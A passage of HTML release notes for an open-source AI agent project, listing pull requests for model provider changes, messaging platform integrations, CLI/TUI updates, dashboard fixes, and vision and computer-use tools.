<li><strong>Custom provider: prompt and persist explicit <code>api_mode</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25068" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25068/hovercard">#25068</a>)</li>
<li><strong>Rename Alibaba Cloud → Qwen Cloud, reorder picker</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24835" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24835/hovercard">#24835</a>)</li>
<li><strong>Restore gpt-5.3-codex-spark for ChatGPT Pro</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363243703" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/18286" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/18286/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/18286">#18286</a> + <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374103180" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/19530" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/19530/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/19530">#19530</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331658979" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16172" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/16172/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/16172">#16172</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22991" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22991/hovercard">#22991</a>)</li>
<li><strong>Inject tool-use enforcement for GLM models</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24715" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24715/hovercard">#24715</a>)</li>
<li><strong>Use Nous Portal as model metadata authority</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/24502" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24502/hovercard">#24502</a>)</li>
<li><strong>Unified <code>client=hermes-client-v&lt;version&gt;</code> tag on every Portal request</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24779" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24779/hovercard">#24779</a>)</li>
<li><strong>Prevent stale Ollama credentials after provider switch</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21703" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21703/hovercard">#21703</a>)</li>
<li><strong>Auxiliary client: rotate pooled auth after quota failures</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413655442" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22779" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22779/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22779">#22779</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22792" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22792/hovercard">#22792</a>)</li>
<li><strong>Auxiliary client: skip providers without credentials immediately</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442897934" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25395" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25395/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25395">#25395</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25487" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25487/hovercard">#25487</a>)</li>
<li><strong>Auth: send Nous refresh token via header</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21578" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21578/hovercard">#21578</a>)</li>
<li><strong>MiniMax: harden OAuth dashboard and runtime</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24165" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24165/hovercard">#24165</a>)</li>
</ul>
<h3>OpenAI-compatible proxy</h3>
<ul>
<li><strong>Local OpenAI-compatible proxy for OAuth providers</strong> — Codex / Aider / Cline can hit Claude Pro, ChatGPT Pro, SuperGrok (<a href="https://github.com/NousResearch/hermes-agent/pull/25969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25969/hovercard">#25969</a>)</li>
</ul>
<hr>
<h2>📱 Messaging Platforms (Gateway)</h2>
<h3>New platforms</h3>
<ul>
<li><strong>LINE Messaging API platform plugin</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23197" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23197/hovercard">#23197</a>)</li>
<li><strong>SimpleX Chat platform plugin</strong> (salvages <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4117407388" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/2558" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/2558/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/2558">#2558</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26232" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26232/hovercard">#26232</a>)</li>
</ul>
<h3>Microsoft Graph foundation</h3>
<ul>
<li><strong>msgraph: add auth and client foundation</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400317607" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21408" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21408/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21408">#21408</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21922" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21922/hovercard">#21922</a>)</li>
<li><strong>msgraph: add webhook listener platform</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400318904" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21409" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21409/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21409">#21409</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21969" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21969/hovercard">#21969</a>)</li>
<li><strong>teams-pipeline: add plugin runtime and operator cli</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400320220" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21410" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21410/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21410">#21410</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22007" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22007/hovercard">#22007</a>)</li>
<li><strong>teams: add pipeline outbound delivery via existing adapter</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400321291" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21411" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21411/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21411">#21411</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22024" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22024/hovercard">#22024</a>)</li>
</ul>
<h3>Cross-platform</h3>
<ul>
<li><strong>Per-platform admin/user split for slash commands</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4186299753" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/4443" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/4443/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/4443">#4443</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23373" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23373/hovercard">#23373</a>)</li>
<li><strong>Forensics on signal handling — non-blocking diag, per-phase timing, stale-unit warning</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23285" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23285/hovercard">#23285</a>)</li>
<li><strong>Keep gateway running when platforms fail; add per-platform circuit breaker + <code>/platform</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26600" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26600/hovercard">#26600</a>)</li>
<li><strong>Wire <code>clarify</code> tool with inline keyboard buttons on Telegram</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24199" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24199/hovercard">#24199</a>)</li>
<li><strong>Add <code>chat_id</code> to <code>hook_ctx</code> for message source tracking</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24710" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24710/hovercard">#24710</a>)</li>
</ul>
<h3>Telegram</h3>
<ul>
<li><strong>Native draft streaming via <code>sendMessageDraft</code> (Bot API 9.5+)</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4153857159" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/3412" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/3412/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/3412">#3412</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23512" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23512/hovercard">#23512</a>)</li>
<li><strong>Stream Telegram edits safely</strong> — salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4411022272" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22264" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22264/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22264">#22264</a> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22518" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22518/hovercard">#22518</a>)</li>
<li><strong>Telegram notification mode</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413638873" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22772" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22772/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22772">#22772</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22793" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22793/hovercard">#22793</a>)</li>
<li><strong>Telegram guest mention mode</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22759" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22759/hovercard">#22759</a>)</li>
<li><strong>Split-and-deliver oversized edits instead of silent truncation</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4374174566" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/19537" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/19537/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/19537">#19537</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23576" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23576/hovercard">#23576</a>)</li>
<li><strong>Preserve DM topic routing via reply fallback</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408968252" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22053" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22053/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22053">#22053</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22410" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22410/hovercard">#22410</a>)</li>
<li><strong>Pass <code>source.thread_id</code> explicitly on auto-reset notice</strong> (carve-out of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4241919580" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/7404" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/7404/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/7404">#7404</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/23440" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23440/hovercard">#23440</a>)</li>
</ul>
<h3>Discord</h3>
<ul>
<li><strong>Render clarify choices as buttons</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25485" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25485/hovercard">#25485</a>)</li>
<li><strong>Channel history backfill — default on, broadened scope</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25984" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25984/hovercard">#25984</a>)</li>
<li><strong><code>thread_require_mention</code> for multi-bot threads</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442115964" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25313" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25313/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25313">#25313</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25445" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25445/hovercard">#25445</a>)</li>
</ul>
<h3>Slack</h3>
<ul>
<li><strong>Support <code>!cmd</code> as alternate prefix for slash commands in threads</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25355" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25355/hovercard">#25355</a>)</li>
</ul>
<h3>WhatsApp</h3>
<ul>
<li><strong>Surface quoted reply metadata from Baileys</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4442902475" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/25398" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25398/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/25398">#25398</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25489" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25489/hovercard">#25489</a>)</li>
</ul>
<h3>Feishu / Google Chat / others</h3>
<ul>
<li><strong>Feishu: native update prompt cards</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22448" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22448/hovercard">#22448</a>)</li>
<li><strong>Google Chat: repair setup prompt imports</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/helix4u/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/helix4u">@helix4u</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22038" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22038/hovercard">#22038</a>)</li>
<li><strong>Google Chat: honor relay-declared sender_type</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4409786696" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22107" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22107/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22107">#22107</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22432" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22432/hovercard">#22432</a>)</li>
<li><strong>LINE: use <code>build_source</code> instead of nonexistent <code>create_source</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24717" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24717/hovercard">#24717</a>)</li>
<li><strong>Add <code>weixin, and more</code> to gateway docs</strong> (salvage of <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4396673114" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/21063" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21063/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/21063">#21063</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wuwuzhijing/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wuwuzhijing">@wuwuzhijing</a>)</li>
</ul>
<hr>
<h2>🖥️ CLI &amp; TUI</h2>
<h3>CLI</h3>
<ul>
<li><strong>Show YOLO mode warning in banner and status bar</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26238" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26238/hovercard">#26238</a>)</li>
<li><strong>Confirm prompt for destructive slash commands</strong> (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174599074" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/4069" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/4069/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/4069">#4069</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/22687" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22687/hovercard">#22687</a>)</li>
<li><strong><code>docker_extra_args</code> + <code>display.timestamps</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/23599" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/23599/hovercard">#23599</a>)</li>
<li><strong>Delegate tool: show user's actual concurrency / spawn-depth limits in description</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22694" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22694/hovercard">#22694</a>)</li>
</ul>
<h3>TUI</h3>
<ul>
<li><strong><code>/sessions</code> slash command for browsing and resuming previous sessions</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/20805" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20805/hovercard">#20805</a>)</li>
<li><strong>Segment turns with rule above non-first user msgs; trim ticker dead space</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21846" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21846/hovercard">#21846</a>)</li>
<li><strong>Support attaching to an existing gateway</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21978" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21978/hovercard">#21978</a>)</li>
<li><strong>Resolve markdown links to readable page titles</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/24013" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24013/hovercard">#24013</a>)</li>
<li><strong>Width-aware markdown table rendering with vertical fallback</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alt-glitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alt-glitch">@alt-glitch</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26195" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26195/hovercard">#26195</a>)</li>
<li><strong>Keep Ink displayCursor in sync with fast-echo writes so cursor stops drifting</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26717" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26717/hovercard">#26717</a>)</li>
<li><strong>Allow transcript scroll + Esc during approval/clarify/confirm prompts</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26414" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26414/hovercard">#26414</a>)</li>
<li><strong>Preserve session when switching personality</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/20942" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20942/hovercard">#20942</a>)</li>
<li><strong>Skip native safety net on OSC52-capable terminals</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/benbarclay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/benbarclay">@benbarclay</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/20954" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/20954/hovercard">#20954</a>)</li>
</ul>
<h3>Dashboard / GUI</h3>
<ul>
<li><strong>Route embedded TUI through dashboard gateway</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OutThisLife/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OutThisLife">@OutThisLife</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21979" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21979/hovercard">#21979</a>)</li>
<li><strong>Hide token/cost analytics behind config flag (default off)</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25438" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25438/hovercard">#25438</a>)</li>
<li><strong>Fix Langfuse observability — trace I/O, tool outputs, placeholder credentials</strong> (closes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4411518378" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22342" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/22342/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/22342">#22342</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413605274" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22763" data-hovercard-type="issue" data-hovercard-url="/NousResearch/hermes-agent/issues/22763/hovercard" href="https://github.com/NousResearch/hermes-agent/issues/22763">#22763</a>) (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kshitijk4poor/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kshitijk4poor">@kshitijk4poor</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/26320" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26320/hovercard">#26320</a>)</li>
<li><strong>MiniMax 'Login' button launched Claude OAuth</strong> (salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4413936898" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/22849" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22849/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/22849">#22849</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/24058" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24058/hovercard">#24058</a>)</li>
<li><strong>Update cron modals</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/25985" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25985/hovercard">#25985</a>)</li>
<li><strong>Analytics: prevent silent token loss and add Claude 4.5–4.7 pricing</strong> (<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/austinpickett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/austinpickett">@austinpickett</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21455" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21455/hovercard">#21455</a>)</li>
</ul>
<hr>
<h2>🔧 Tools &amp; Capabilities</h2>
<h3>Vision &amp; video</h3>
<ul>
<li><strong><code>vision_analyze</code> returns pixels to vision-capable models</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/22955" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/22955/hovercard">#22955</a>)</li>
<li><strong>Unified <code>video_generate</code> with pluggable provider backends</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/25126" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/25126/hovercard">#25126</a>)</li>
<li><strong><code>image_gen</code>: actionable setup message when no FAL backend is reachable</strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/26222" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/26222/hovercard">#26222</a>)</li>
</ul>
<h3>Computer use</h3>
<ul>
<li><strong><code>computer_use</code> cua-driver backend + focus-safe ops + non-Anthropic provider fix</strong> (re-salvage <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341933760" data-permission-text="Title is private" data-url="https://github.com/NousResearch/hermes-agent/issues/16936" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/16936/hovercard" href="https://github.com/NousResearch/hermes-agent/pull/16936">#16936</a>) (<a href="https://github.com/NousResearch/hermes-agent/pull/21967" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/21967/hovercard">#21967</a>)</li>
<li><strong>Refresh cua-driver on <code>hermes update</code> + add <code>install --upgrade</code></strong> (<a href="https://github.com/NousResearch/hermes-agent/pull/24063" data-hovercard-type="pull_request" data-hovercard-url="/NousResearch/hermes-agent/pull/24063/hovercard">#24063</a>)</li>
</ul>
<h3>LSP &amp; write-time diagnostics</h3>
<ul>
